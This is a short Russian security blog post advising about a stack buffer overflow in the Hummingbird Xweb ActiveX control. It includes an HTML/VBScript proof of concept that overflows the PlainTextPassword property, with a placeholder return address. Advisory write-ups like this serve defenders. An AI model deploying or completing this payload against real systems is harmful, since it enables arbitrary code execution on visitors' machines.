Безопасность в интернете, то что должен знать каждый человек у которого есть компьютер! Информация будет полезна для администраторов, занимающихся обеспечением безопасности сетей, для программистов, стремящихся к созданию защищенных приложений, а также для всех тех, кто интересуется вопросами сетевой защиты.

Эксплоит для Hummingbird Xweb ActiveX к переполнению буфера

Описание эксплойта:
В версии 13.0 уязвимость отсутствует, т.к. она скомпилирована с опцией "/gs", в отличие от предыдущих.


Пример эксплоита:
<object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object>
<script language='vbscript'>
arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX"
target.PlainTextPassword = arg1
</script>
</html>

Примечание: XXXX - перезаписанный адрес возврата.


Описание уязвимости:
В ActiveX-компоненте Hummingbird Xweb (Hummingbird.XWebHostCtrl.1, hclxweb.dll) обнаружена уязвимость к выполнению произвольного кода при посещении в Internet Explorer веб-страницы, содержащей вредоносный вызов. Присвоение чрезмерно длинного значения свойству "PlainTextPassword" приводит к переполнению буфера, расположенного в стеке.

Уязвимы также продукты Exceed, использующие данный компонент: 10.x, 2006 11.x, 2007, 9.x, Exceed PowerSuite 10.x.


ЗАЩИТА:
По данным на 20 октября 2008 г., уязвимость не устранена.

0 коментарии:



 


© 2008-2009 SecuRRity.BlogSpot.Com